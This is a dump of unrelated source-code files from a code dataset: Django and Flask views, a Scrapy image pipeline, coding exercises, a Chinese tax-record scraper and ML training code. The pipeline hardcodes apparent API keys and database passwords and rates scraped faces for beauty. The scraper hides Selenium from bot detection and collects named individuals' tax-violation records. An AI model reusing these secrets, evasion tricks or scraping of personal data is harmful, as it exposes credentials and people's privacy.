redirect\nfrom django.contrib import messages\nfrom .models import Testimonial, Portfolio, Contact\nfrom .forms import ContactForm\n\n\ndef index(request):\n title = ''\n if request.method == 'POST':\n form = ContactForm(request.POST or None, request.FILES or None)\n\n if form.is_valid():\n form.save()\n messages.success(request, f'I have got you message. I will get back to you as soon as possible.')\n return redirect('core:index')\n else:\n form = ContactForm()\n\n testimonials = Testimonial.objects.all().order_by('-id')\n portfolio = Portfolio.objects.all().order_by('-id')\n context = {\n 'title': title,\n 'testimonials': testimonials,\n 'portfolio': portfolio,\n 'form': form\n }\n return render(request, 'core/index.html', context)\n","sub_path":"core/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":861,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"136001479","text":"# -*- coding: utf-8 -*-\n\n# Define your item pipelines here\n#\n# Don't forget to add your pipeline to the ITEM_PIPELINES setting\n# See: https://docs.scrapy.org/en/latest/topics/item-pipeline.html\nimport json\nimport random\nimport os\nfrom scrapy.exceptions import DropItem\nfrom scrapy.pipelines.images import ImagesPipeline\nfrom scrapy.http import Request\nfrom aip import AipFace\nimport base64\nimport mysql.connector\n\nAPP_ID = '17174146'\nAPI_KEY = 'MyKcGkviUKBQCpZGhOkFoX2L'\nSECRET_KEY = 'vtt8kak80lFhYRNtpBaq9jWmCvvgBRlo'\n\nAPP_ID1 = '17181482'\nAPI_KEY1 = 'rsS6060o13VBfZZ6fwATnHVH'\nSECRET_KEY1 = 'DtmNEpfirwfOrD42YSLtcRlZfX7pNwZe'\nclass WeiboPipeline(ImagesPipeline):\n def get_media_requests(self, item, info):\n url = item['image_urls']\n USER_AGENT_LIST = [\n 'MSIE (MSIE 6.0; X11; Linux; i686) Opera 7.23',\n 'Opera/9.20 (Macintosh; Intel Mac OS X; U; en)',\n 'Opera/9.0 (Macintosh; PPC Mac OS X; U; en)',\n 'iTunes/9.0.3 (Macintosh; U; Intel Mac OS X 10_6_2; en-ca)',\n 'Mozilla/4.76 [en_jp] (X11; U; SunOS 5.8 sun4u)',\n 'iTunes/4.2 (Macintosh; U; PPC Mac OS X 10.2)',\n 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:5.0) Gecko/20100101 Firefox/5.0',\n 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:9.0) Gecko/20100101 Firefox/9.0',\n 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:16.0) Gecko/20120813 Firefox/16.0',\n 'Mozilla/4.77 [en] (X11; I; IRIX;64 6.5 IP30)',\n 'Mozilla/4.8 [en] (X11; U; SunOS; 5.7 sun4u)'\n ]\n # 随机生成user agent\n USER_AGENT = random.choice(USER_AGENT_LIST)\n headers = {\n 'Referer': \"http://www.umei.cc/\",\n 'User-Agent': USER_AGENT,\n }\n conn = mysql.connector.connect(host='127.0.0.1', user='root', password='root', database='bigdata')\n db = conn\n cursor = db.cursor()\n sql = \"SELECT * from pic where img_url = %s LIMIT 1\"\n val = (url,)\n cursor.execute(sql, val)\n myresult = cursor.fetchone()\n cursor.close()\n if myresult:\n return item\n else:\n yield Request(url, headers=headers)\n\n def item_completed(self, results, item, info):\n print(item)\n print('thisis pix')\n conn = mysql.connector.connect(host='127.0.0.1', user='root', password='root', database='bigdata')\n db = conn\n image_paths = [x['path'] for ok, x in results if ok] # ok判断是否下载成功\n if not image_paths:\n raise DropItem(\"Item contains no images\")\n # item['image_paths'] = image_paths\n else:\n print('dowok')\n for ok, x in results:\n path = x['path']\n rootpath = os.path.abspath('..')\n filePath = rootpath + \"\\\\images\\\\\"+path\n print(filePath)\n aipFace = AipFace(APP_ID, API_KEY, SECRET_KEY)\n imageType = \"BASE64\"\n options = {}\n options[\"face_field\"] = \"age,gender,beauty\"\n with open(filePath, 'rb') as fp:\n content = base64.b64encode(fp.read())\n base64ss = content.decode('utf-8')\n result = aipFace.detect(base64ss, imageType, options)\n beauty = 0\n if result['error_code'] == 0:\n face = result['result']['face_list']\n beauty = face[len(face)-1]['beauty']\n elif result['error_code']==18:\n aipFace1 = AipFace(APP_ID1, API_KEY1, SECRET_KEY1)\n result1 = aipFace1.detect(base64ss, imageType, options)\n if result1['error_code'] == 0:\n face = result1['result']['face_list']\n beauty = face[len(face) - 1]['beauty']\n img_url = item['image_urls']\n type = 1\n cursor = db.cursor()\n sql = \"INSERT INTO pic (img_url,`type`,beauty) VALUES (%s,%s,%s)\"\n val = (img_url,type,beauty)\n cursor.execute(sql, val)\n db.commit()\n cursor.close()\n print(\"1 条记录已插入, ID:\", cursor.lastrowid)\n\n return item\n\n def get_file_content(filePath):\n with open(filePath, 'rb') as fp:\n content = base64.b64encode(fp.read())\n return content.decode('utf-8')\n\n\n\n\n","sub_path":"pachou/weibo/pipelines.py","file_name":"pipelines.py","file_ext":"py","file_size_in_byte":4341,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"108860486","text":"import math\n\nclass Solution:\n def maxSubArray(self, nums):\n if not nums:\n return 0\n\n max_so_far = -math.inf\n max_ending_here = 0\n\n for num in nums:\n max_ending_here = max(max_ending_here + num, num)\n max_so_far = max(max_ending_here, max_so_far)\n\n return max_so_far\n\n\nclass TestSolution:\n\n def __init__(self):\n self.solution = Solution()\n\n def test_no_nums(self):\n nums = []\n\n expected = 0\n actual = self.solution.maxSubArray(nums)\n\n assert actual == expected\n\n def test_one_negative_num(self):\n nums = [-1]\n\n expected = -1\n actual = self.solution.maxSubArray(nums)\n\n assert actual == expected\n\n def test_one_num(self):\n nums = [1]\n\n expected = 1\n actual = self.solution.maxSubArray(nums)\n\n assert actual == expected\n\n def test_whole_array(self):\n nums = [1, 2, 3, 4, 5, 6]\n\n expected = 21\n actual = self.solution.maxSubArray(nums)\n\n assert actual == expected\n\n def test_middle_of_array(self):\n nums = [-1, 2, 3, 4, 5, -6]\n\n expected = 14\n actual = self.solution.maxSubArray(nums)\n\n assert actual == expected\n\n def test_small_negative_in_middle_of_array(self):\n nums = [-1, 2, 3, -1, 4, 5, -6]\n\n expected = 13\n actual = self.solution.maxSubArray(nums)\n\n assert actual == expected\n\n def test_large_negative_in_middle_of_array(self):\n nums = [-1, 2, 3, -10, 4, 5, -6]\n\n expected = 9\n actual = self.solution.maxSubArray(nums)\n\n assert actual == expected\n\n def run_test(self, test, test_name):\n print('Running {}...'.format(test_name))\n\n try:\n test()\n except:\n print('Failed {}'.format(test_name))\n else:\n print('Passed {}!'.format(test_name))\n\n def run_tests(self):\n self.run_test(self.test_no_nums, 'test_no_nums')\n self.run_test(self.test_one_negative_num, 'test_one_negative_num')\n self.run_test(self.test_one_num, 'test_one_num')\n self.run_test(self.test_whole_array, 'test_whole_array')\n self.run_test(self.test_middle_of_array, 'test_middle_of_array')\n self.run_test(self.test_small_negative_in_middle_of_array, 'test_small_negative_in_middle_of_array')\n self.run_test(self.test_large_negative_in_middle_of_array, 'test_large_negative_in_middle_of_array')\n\n\ntester = TestSolution()\ntester.run_tests()\n","sub_path":"53_maximum_subarray.py","file_name":"53_maximum_subarray.py","file_ext":"py","file_size_in_byte":2280,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"629894420","text":"from flaskexample import app\nfrom flask import render_template\nfrom flask import request\nfrom functions import *\n\n@app.route('/')\ndef index():\n frontpage_articles = GetNYTHeadlines()\n\n return render_template(\"index.html\", frontpage_articles = frontpage_articles)\n\n@app.route('/', methods=['POST'])\ndef my_form_post():\n\n article_url = request.form['url'] # Parses URL input from index page\n #print('yt_url',yt_url)\n\n # Scrapes article text from website\n en_title, ch_title, eng_text, ch_text = GetDualArticleText(article_url)\n \n if en_title == None:\n \treturn 'Bad webpage!'\n\n # Does analysis of vocab in article, and creates difficulty plot\n vocab_df, difficulty_plot, ch_marked_para = ChTextAnalysis(ch_text)\n\n # Sorts by HSK level\n vocab_df.sort_values(by=['Level'], inplace=True)\n\n # Turns values into integers or \"N/A\" if NaNs\n frequency = []\n for x in vocab_df['Frequency'].values:\n if x == x:\n frequency.append(int(x))\n else:\n frequency.append('N/A')\n\n level = []\n for x in vocab_df['Level'].values:\n if x == x:\n level.append(int(x))\n else:\n level.append('N/A')\n\n vocab_df['Frequency'] = frequency\n vocab_df['Level'] = level\n\n vocab_data = zip(vocab_df['Word'].values, vocab_df['Pinyin'].values, \\\n vocab_df['Definitions'].values, vocab_df['Frequency'].values, \\\n vocab_df['Level'].values, )\n\n #article_text = zip(eng_text, ch_text)\n article_text = zip(eng_text, ch_marked_para)\n \n return render_template(\"result.html\",\\\n article_url=article_url, \\\n article_text = article_text, \\\n en_title = en_title, \\\n ch_title = ch_title,\\\n difficulty_plot = difficulty_plot,\\\n vocab_data = vocab_data)","sub_path":"nyt_cn_analyzer/flaskexample/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1799,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"189558213","text":"# -*- coding: utf-8 -*-\n\nimport os\n\n\nos.environ.setdefault('DJANGO_SETTINGS_MODULE', 'core.settings')\n\nimport django\n\ndjango.setup()\n\nfrom macro.models import MacroHead, MacroContents\n\n\ndef populate():\n for head, contents in apps.macro.lib.wizmacro.read_macro('media/user.dat'):\n macro_head = add_head(slot=head['slot'],\n name=head['name'],\n color=head['color'],\n description=head['description'])\n for c in contents:\n add_contents(macro=macro_head, contents=c)\n\n for mh in MacroHead.objects.all():\n for mc in MacroContents.objects.filter(macro=mh):\n print(\"- {0} - {1}\".format(str(mh), str(mc)))\n\n\ndef add_head(slot, name, color, description):\n h = MacroHead.objects.get_or_create(slot=slot)[0]\n h.name = name\n h.color = color\n h.description = description\n h.save()\n\n return h\n\n\ndef add_contents(macro, contents):\n c = MacroContents.objects.get_or_create(macro=macro, contents=contents)[0]\n\n return c\n\n\nif __name__ == '__main__':\n print(\"Macroアプリにテストデータの投入を開始します\")\n populate()","sub_path":"macronia/populate_macro.py","file_name":"populate_macro.py","file_ext":"py","file_size_in_byte":1180,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"518794892","text":"import sys\r\n\r\nfrom PyQt5 import QtWidgets\r\n\r\nimport mData\r\n\r\ndef main():\r\n app = QtWidgets.QApplication(sys.argv)\r\n window = mData.App()\r\n window.show()\r\n app.exec_()\r\n\r\nif __name__ == '__main__':\r\n main()\r\n #mDB = mDataBase()\r\n #query = \"UPDATE test SET testcol1 = 'tesqwasdfe564' WHERE idtest = 3 \"\r\n #query = \"INSERT INTO test(testcol1) VALUES ('testasdq')\"\r\n #rw = mDB.update(query)","sub_path":"0.2/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":413,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"533578514","text":"# 只出现一次的数字\r\n\r\na = [3, 3, 5, 4, 6, 5, 7, 4, 6, 8, 8, 9, 9, 0, 0]\r\n'''\r\nfor i in a:\r\n if a.count(i) == 1:\r\n print(i)\r\n break\r\n # 运行时间过长\r\n'''\r\naa = set(a)\r\nprint(sum(list(aa))*2-sum(a))\r\n\r\n","sub_path":"leetcode_singleNumber.py","file_name":"leetcode_singleNumber.py","file_ext":"py","file_size_in_byte":234,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"87787029","text":"#! /opt/jython/bin/jython\n# -*- coding: utf-8 -*-\n#\n#\tjson_read.py\n#\n#\t\t\t\t\tOct/12/2016\n#\n#\nimport\tsys\nimport\tjson\n#\nreload(sys)\nsys.setdefaultencoding(\"utf-8\")\n#\nsys.path.append ('/var/www/data_base/common/python_common')\nsys.path.append ('/var/www/data_base/common/jython_common')\nfrom jython_file_io import file_to_str_proc\nfrom text_manipulate import dict_display_proc\n# -------------------------------------------------------------\nsys.stderr.write (\"*** 開始 ***\\n\")\n#\nfile_in = sys.argv[1]\n#\njson_str = file_to_str_proc (file_in)\n#\ndict_aa = json.loads (json_str)\ndict_display_proc (dict_aa)\n#\nsys.stderr.write (\"*** 終��� ***\\n\")\n# -------------------------------------------------------------\n","sub_path":"json/jython/read/json_read.py","file_name":"json_read.py","file_ext":"py","file_size_in_byte":704,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"18924277","text":"#encoding=utf-8\r\n\r\n#税务违法 大连市信息获取\r\n\r\nimport requests\r\nfrom selenium import webdriver\r\nimport time\r\nimport re\r\n\r\n\r\ndef getDriver():\r\n headers = {\r\n 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; ) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/82.0.4068.4 Safari/537.36'\r\n }\r\n url = 'http://17610040106.v4.dailiyun.com/query.txt?key=NP86444E99&word=&count=1&rand=false<ime=0&norepeat=false&detail=false'\r\n response = requests.get(url, headers=headers)\r\n proxy_dly = response.text.strip()\r\n options = webdriver.ChromeOptions()\r\n if proxy_dly:\r\n proxies = {\r\n \"http\": \"http://\" + proxy_dly,\r\n \"https\": \"http://\" + proxy_dly\r\n }\r\n options.add_argument('--proxy-server' + proxies['https'])\r\n\r\n options.add_argument(\"--disable-extensions\") # 禁用扩展\r\n options.add_argument(\"--disable-gpu\") # 谷歌文档提到需要加上这个属性来规避bug\r\n options.add_experimental_option('excludeSwitches', ['enable-automation'])\r\n options.add_argument('--headless') # 无界面形式\r\n options.add_argument('--no-sandbox') # 取消沙盒模式\r\n # options.add_argument('-kiosk') # 全屏\r\n # options.add_argument(\"--window-size=1920,900\") # 指定浏览器分辨率\r\n # options.set_window_size(480, 600) # 窗口大小变化\r\n options.add_argument('--disable-setuid-sandbox')\r\n options.add_experimental_option(\"useAutomationExtension\", False)\r\n options.add_argument('--incognito') # 启动进入隐身模式\r\n options.add_argument('--lang=zh-CN') # 设置语言为简体中文\r\n options.add_argument(\r\n '--user-agent=Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36')\r\n options.add_argument('--hide-scrollbars') # 隐藏滚动条, 应对一些特殊页面\r\n options.add_argument('--disable-bundled-ppapi-flash') # 禁用 Flash 的捆绑 PPAPI 版本\r\n options.add_argument('--mute-audio') # 将发送到音频设备的音频静音,使其在自动测试期间听不到\r\n\r\n driver = webdriver.Chrome(executable_path='F:\\chromedriver.exe', options=options)\r\n driver.execute_cdp_cmd(\"Network.enable\", {})\r\n driver.execute_cdp_cmd(\"Network.setExtraHTTPHeaders\", {\"headers\": {\"User-Agent\": \"browserClientA\"}})\r\n driver.execute_cdp_cmd(\"Page.addScriptToEvaluateOnNewDocument\", {\r\n \"source\": \"\"\"\r\n Object.defineProperty(navigator, 'webdriver', {\r\n get: () => undefined\r\n })\r\n \"\"\"\r\n })\r\n\r\n return driver\r\n\r\ndef getInfo(i):\r\n url='http://dalian.chinatax.gov.cn/module/jslib/bulletin2/lpindex.html'\r\n driver=getDriver()\r\n driver.get(url)\r\n driver.switch_to.frame('top')\r\n #纳税人名称\r\n nsrmc='大连永多贸易有限公司'\r\n #nsrmc='北京字节跳动科技有限公司'\r\n driver.find_element_by_xpath('//*[@id=\"na_name\"]').send_keys(nsrmc)\r\n time.sleep(1)\r\n driver.find_element_by_xpath('//*[@id=\"form1\"]/button[1]').click()\r\n time.sleep(1)\r\n driver.switch_to.default_content()\r\n driver.switch_to.frame('right')\r\n\r\n result=driver.find_element_by_xpath('//*[@id=\"jpage\"]').get_attribute('innerHTML')\r\n if re.findall(r\"很遗憾,没有检索到任何记录!\",result):\r\n print('无符合公布标准的案件信息')\r\n driver.quit()\r\n exit(0)\r\n else:\r\n #print(re.sub(u\"\\\\<.*?\\\\>\",\"\",result))\r\n driver.find_element_by_xpath('//*[@id=\"jpage\"]/div/div/table/tbody/tr/td/table[2]/tbody/tr['+str(i)+']/td[1]/a').click()\r\n driver.switch_to.default_content()\r\n time.sleep(1)\r\n driver.switch_to.frame('right')\r\n info=driver.find_element_by_xpath('/html/body/div[2]/div/table/tbody').get_attribute('innerHTML')\r\n #print(info)\r\n info1=info\r\n info2 = re.sub(u\"\\\\\", \",\", info1)\r\n info3 = re.sub(u\"\\\\\", \"、\", info2)\r\n info4 = re.sub(u\"\\\\<.*?\\\\>\", \"\", info3)\r\n info5 = re.sub(u\"\\n\", \"\", info4)\r\n info6 = re.sub(u\"\\t\", \"\", info5)\r\n info7 = re.sub(u\"begin-->\", \"\", info6)\r\n info8 = re.sub(u\"end-->\", \"\", info7)\r\n info8 = re.sub(u\"\\\\<.*?\\\\>\", \",\", info8)\r\n info9 = info8.replace(' ', '').replace('、','').split(',')\r\n print(info9)\r\n\r\n driver.quit()\r\n\r\nif __name__ == '__main__':\r\n try:\r\n for i in range(1,11):\r\n getInfo(i)\r\n except:\r\n exit(1)\r\n\r\n'''\r\n\r\n//*[@id=\"jpage\"]/div/div/table/tbody/tr/td/table[2]/tbody/tr[1]/td[1]/a\r\n//*[@id=\"jpage\"]/div/div/table/tbody/tr/td/table[2]/tbody/tr[2]/td[1]/a\r\n\r\n'''\r\n\r\n'''\r\n\r\n \r\n 检查机关\r\n\r\n \r\n 国家税务总局大连市税务局第一稽查局 \r\n \r\n \r\n 所属年度\r\n\r\n \r\n 2021年 \r\n \r\n \r\n 所属月份\r\n\r\n \r\n 5月 \r\n \r\n \r\n 纳税人或者法人或者其他组织或者自然人名称 \r\n 大连永多贸易有限公司 \r\n \r\n \r\n \r\n 组织机构代码 \r\n \r\n \r\n \r\n 注册地址 \r\n 辽宁省大连市中山区长江路29号12层1207-7 \r\n \r\n \r\n 法定代表人或负责人或经法院裁判确定的实际责任人 \r\n 杨猛 \r\n \r\n \r\n 法定代表人或者负责人性别 \r\n 男性 \r\n \r\n \r\n 法定代表人或者负责人证件名称 \r\n 身份证 \r\n \r\n \r\n 法定代表人或者负责人证件号码 \r\n 210726********1530 \r\n \r\n \r\n 经法院裁判负直接责任的财务人员姓名 \r\n \r\n\r\n \r\n 负有直接责任的财务负责人性别 \r\n \r\n\r\n \r\n 负有直接责任的财务负责人证件名称 \r\n \r\n\r\n \r\n 负有直接责任的财务负责人证件号码 \r\n \r\n\r\n \r\n 负有直接责任的中介机构信息及其从业人员信息 \r\n \r\n\r\n \r\n 案件性质 \r\n 走逃(失联) \r\n\r\n \r\n 主要违法事实 \r\n 经国家税务总局大连市税务局第一稽查局检查,发现其在2017年01月01日至2019年12月31日期间,主要存在以下问题:对外虚开普通发票125份,票面额累计959.79万元。经国家税务总局大连市税务局第一稽查局查证确认走逃(失联),已发布走逃(失联)纳税人公告。 \r\n\r\n \r\n 相关法律依据及税务处理处罚情况 \r\n 依照《中华人民共和国税收征收管理法》等相关法律法规的有关规定,依法移送公安机关。 \r\n\r\n\r\n\r\n'''","sub_path":"工作内容/税务/dalian.py","file_name":"dalian.py","file_ext":"py","file_size_in_byte":12897,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"264599689","text":"# ---------------------- #\n# Author: Ben Davis #\n# File name: lab05.py #\n# Class: CSC 120 #\n# ---------------------- #\nimport random\n\n# 1 - Learn to Write Pseudocode - Find max value in a list\nprint(\"Lab Question #1\")\nlist1 = [1, 23, 454, 543, 2, 123]\nhigh_number = list1[0]\n\nfor x in list1:\n if x > high_number:\n high_number = x\nprint(high_number)\nprint()\n\n# 2 - Convert the following code into the function create_list()\n# import random\n# MAX_LEN = 50\n# my_list = []\n# for i in range(MAX_LEN):\n# my_list.append(random.randint(1, 99))\nprint(\"Lab Question #2\")\n\n\ndef create_list():\n MAX_LEN = 50\n my_list = []\n for num in range(MAX_LEN):\n my_list.append(random.randint(1, 99))\n print(my_list)\n return my_list\n\n\ncreate_list()\nprint()\n\n# 3 - Find the length of all the strings in the below list. Use a for or a while loop\nprint(\"Lab Question #3\")\nnames = [\"Jennifer\", \"Albatross\", \"Justin\", \"Dave\", \"Shankarnarayan\", \"Ezra\", \"Alice\", \"Kwabena\"]\ncount_list = []\n\nfor i in names:\n count_list.append(len(str(i)))\nprint(count_list)\nprint()\n\n# 4 - Write a program to find the count of all names that are <= than itself in the provided list.\n# Use two nested loops to get all points.\nprint(\"Lab Question #4\")\nnames2 = [\"Jennifer\", \"Albatross\", \"Justin\", \"Dave\", \"Shankarnarayan\", \"Ezra\", \"Alice\", \"Kwabena\"]\n\n\ndef for_short_names():\n shorter = []\n\n for k in names2:\n for k2 in names2:\n if len(k) > len(k2):\n shorter.append(k2)\n\n length = len(shorter)\n print(f\"The name {k} is longer than: {length}.\")\n\n if len(shorter) > 0:\n print(shorter)\n shorter = []\n print()\n\n\nfor_short_names()\n\n\n# 5 - Modify the above program to use two nested while loops\nprint(\"Lab Question #5\")\nnames3 = [\"Jennifer\", \"Albatross\", \"Justin\", \"Dave\", \"Shankarnarayan\", \"Ezra\", \"Alice\", \"Kwabena\"]\n\n\ndef while_short_names():\n shorter2 = []\n count = 0\n idx1 = 0\n\n while idx1 < len(names3):\n idx2 = 0\n while idx2 < len(names3):\n if len(names3[idx1]) >= len(names3[idx2]):\n if names3[idx1] != names3[idx2]:\n count += 1\n shorter2.append(names3[idx2])\n idx2 += 1\n else:\n idx2 += 1\n else:\n idx2 += 1\n print(f\"Names shorter than or equal to {names3[idx1]} are {count} names.\")\n print(shorter2)\n print()\n idx1 += 1\n shorter2 = []\n count = 0\n\n\nwhile_short_names()\n\n\n# 6 - Implement a leaderboard using a list. The leaderboard tracks the top 5 scores that have been posted.\n# If a higher score has been achieved, the leaderboard refreshes with the new top 5 scores.\nprint(\"Lab Question #6\")\n\n\ndef leaderboard():\n top_scores = []\n\n for i in range(50):\n rand_num = random.randint(0, 100)\n if len(top_scores) < 5:\n top_scores.append(rand_num)\n top_scores.sort()\n print(top_scores)\n\n elif rand_num > min(top_scores):\n top_scores.remove(min(top_scores))\n top_scores.append(rand_num)\n top_scores.sort()\n print(top_scores)\n\n print(top_scores)\n\n\nleaderboard()\nprint()\n\nprint(\"Lab Question #6 - Optional Refactor\")\nhi_scores = [99, 87, 89, 99, 65]\n\n\ndef leaderboard2(new_score):\n for v in hi_scores:\n if new_score > v:\n hi_scores.remove(v)\n hi_scores.append(new_score)\n break\n hi_scores.sort()\n print(hi_scores)\n\n\nleaderboard2(100)\nleaderboard2(98)\n","sub_path":"Lab 05/lab05.py","file_name":"lab05.py","file_ext":"py","file_size_in_byte":3633,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"55037068","text":"import os\nimport torch\nimport random\nimport numpy as np\nimport argparse\nimport yaml, shutil\nfrom loader import get_loader\nfrom model import DRCN\nimport utils\nfrom utils.metrics import averageMeter, runningScore\nfrom utils.visualizer import Visualizer\nfrom configs.base_options import BaseOptions\n\nAccNames = ['OA', 'sImpervious_surfaces', 'Building', 'Low_vegetation', 'Tree', 'Car', 'Clutter']\n\n\ndef train(cfg, logger):\n # Setup seeds\n torch.manual_seed(cfg.get(\"seed\", 1337))\n torch.cuda.manual_seed(cfg.get(\"seed\", 1337))\n np.random.seed(cfg.get(\"seed\", 1337))\n random.seed(cfg.get(\"seed\", 1337))\n\n # Setup device\n device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n\n # Setup Dataloader\n loader_train = get_loader(cfg, \"train\")\n loader_val = get_loader(cfg, \"val\")\n\n # Setup model\n model = DRCN(cfg).to(device)\n start_epoch = 1\n if cfg[\"training\"][\"resume\"] is not None:\n if os.path.isfile(cfg[\"training\"][\"resume\"]):\n print(\n \"Loading model and optimizer from checkpoint '{}'\".format(cfg[\"training\"][\"resume\"])\n )\n checkpoint = torch.load(cfg[\"training\"][\"resume\"])\n model.load_state_dict(checkpoint[\"model_state\"])\n start_epoch = checkpoint[\"epoch\"]\n del checkpoint\n\n else:\n print(\"No checkpoint found at '{}'\".format(cfg[\"training\"][\"resume\"]))\n\n # Setup Metrics and visualizer\n running_metrics_val = runningScore(cfg[\"data\"][\"n_classes\"])\n val_loss1_meter = averageMeter()\n val_loss2_meter = averageMeter()\n opt = BaseOptions()\n visualizer = Visualizer(opt)\n\n # Start training\n utils.mkdirs(cfg[\"training\"][\"checkpoint\"])\n\n best_iou = -100.0\n epoch = start_epoch\n train_epochs = cfg[\"training\"][\"epochs\"]\n iters_per_epoch = len(loader_train)\n while epoch < train_epochs:\n visualizer.reset()\n for iter, (images, labels) in enumerate(loader_train):\n model.set_input(images, labels)\n model.optimize_parameters()\n\n if iter % cfg[\"training\"][\"print_interval\"]==0 and iter!=0:\n print_info = \"Epoch:[{:2d}/{:2d}] Iter: [{:4d}/{:4d}] loss1: {:.5f} loss2: {:.5f} lr: {:.5f}\"\\\n .format(epoch, train_epochs, iter, iters_per_epoch, model.loss1.item(), model.loss2.item(), model.optimizer1.defaults['lr'])\n print(print_info)\n\n if iter % cfg[\"training\"][\"val_interval\"] == 0 and iter!=0:\n for images, labels in loader_val:\n model.set_input(images, labels)\n model.inference()\n preds = torch.argmax(model.out1, 1).cpu().numpy()\n labels = labels.data.numpy().squeeze()\n\n running_metrics_val.update(labels, preds)\n val_loss1_meter.update(model.loss1.item())\n val_loss2_meter.update(model.loss2.item())\n\n # visualizer.display_current_results(model.get_current_visuals(), epoch, save_result)\n losses = {'loss1': val_loss1_meter.avg, '5loss2': val_loss2_meter.avg * 5}\n score, class_iou = running_metrics_val.get_scores()\n accs = []\n accs.append(score[\"Overall Acc: \\t\"])\n accs.extend(list(class_iou.values()))\n accs = dict(zip(AccNames, accs))\n tmp = iter/iters_per_epoch\n visualizer.plot_current_losses(epoch, tmp, losses)\n visualizer.plot_current_accuracy(epoch, tmp, accs)\n logger.info(\"Epoch:{:03d} val_loss1:{:.05f} val_loss2:{:.05f}\"\n .format(epoch, val_loss1_meter.avg, val_loss2_meter.avg))\n for k, v in score.items():\n print(k, v)\n logger.info(\"{}: {}\".format(k, v))\n\n for k, v in class_iou.items():\n print(\"{}: {}\".format(k, v))\n logger.info(\"{}: {}\".format(k, v))\n\n running_metrics_val.reset()\n\n if score[\"Mean IoU : \\t\"] >= best_iou:\n best_iou = score[\"Mean IoU : \\t\"]\n state = {\n \"epoch\": epoch,\n \"model_state\": model.state_dict(),\n \"optimizer1_state\": model.optimizer1.state_dict(),\n \"scheduler1_state\": model.scheduler1.state_dict(),\n \"optimizer2_state\": model.optimizer2.state_dict(),\n \"scheduler2_state\": model.scheduler2.state_dict(),\n \"best_iou\": best_iou,\n }\n save_path = os.path.join(\n cfg[\"training\"][\"checkpoint\"],\n \"{}_{}_best_model.pkl\".format(cfg[\"model\"][\"arch\"], cfg[\"data\"][\"dataset\"]),\n )\n torch.save(state, save_path)\n epoch += 1\n\n\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description=\"config\")\n parser.add_argument(\n \"--config\",\n nargs=\"?\",\n type=str,\n default=\"configs/fcn8s_pascal.yml\",\n help=\"Configuration file to use\",\n )\n\n args = parser.parse_args()\n\n with open(args.config) as fp:\n cfg = yaml.load(fp, Loader=yaml.Loader)\n\n logdir = cfg[\"training\"][\"checkpoint\"]\n logger = utils.get_logger(logdir)\n shutil.copy(args.config, logdir)\n\n train(cfg, logger)\n","sub_path":"train_drcn.py","file_name":"train_drcn.py","file_ext":"py","file_size_in_byte":5489,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"77457827","text":"import pytest\nimport pandas as pd\nimport numpy as np\n\nfrom mlserver.codecs.pandas import PandasCodec, _to_response_output\nfrom mlserver.types import (\n InferenceRequest,\n InferenceResponse,\n RequestInput,\n Parameters,\n ResponseOutput,\n)\n\n\n@pytest.mark.parametrize(\n \"series, expected\",\n [\n (\n pd.Series(data=[\"hey\", \"abc\"], name=\"foo\"),\n ResponseOutput(\n name=\"foo\", shape=[2], data=[\"hey\", \"abc\"], datatype=\"BYTES\"\n ),\n ),\n (\n pd.Series(data=[1, 2, 3], name=\"bar\"),\n ResponseOutput(name=\"bar\", shape=[3], data=[1, 2, 3], datatype=\"INT64\"),\n ),\n (\n pd.Series(data=[1, 2.5, 3], name=\"bar\"),\n ResponseOutput(\n name=\"bar\", shape=[3], data=[1.0, 2.5, 3.0], datatype=\"FP64\"\n ),\n ),\n (\n pd.Series(data=[[1, 2, 3], [4, 5, 6]], name=\"bar\"),\n ResponseOutput(\n name=\"bar\", shape=[2], data=[[1, 2, 3], [4, 5, 6]], datatype=\"BYTES\"\n ),\n ),\n ],\n)\ndef test_to_response_output(series, expected):\n response_output = _to_response_output(series)\n\n assert response_output == expected\n\n\n@pytest.mark.parametrize(\n \"dataframe, expected\",\n [\n (\n pd.DataFrame(\n {\n \"a\": [1, 2, 3],\n \"b\": [\"A\", \"B\", \"C\"],\n }\n ),\n InferenceResponse(\n model_name=\"my-model\",\n outputs=[\n ResponseOutput(\n name=\"a\", shape=[3], datatype=\"INT64\", data=[1, 2, 3]\n ),\n ResponseOutput(\n name=\"b\", shape=[3], datatype=\"BYTES\", data=[\"A\", \"B\", \"C\"]\n ),\n ],\n ),\n )\n ],\n)\ndef test_encode(dataframe, expected):\n codec = PandasCodec()\n inference_response = codec.encode(\n expected.model_name, dataframe, model_version=expected.model_version\n )\n\n assert inference_response == expected\n\n\n@pytest.mark.parametrize(\n \"inference_request, expected\",\n [\n (\n InferenceRequest(\n inputs=[\n RequestInput(\n name=\"a\",\n data=[1, 2, 3],\n datatype=\"FP32\",\n shape=[1, 3],\n parameters=Parameters(_decoded_payload=np.array([[1, 2, 3]])),\n ),\n RequestInput(\n name=\"b\",\n data=b\"hello world\",\n 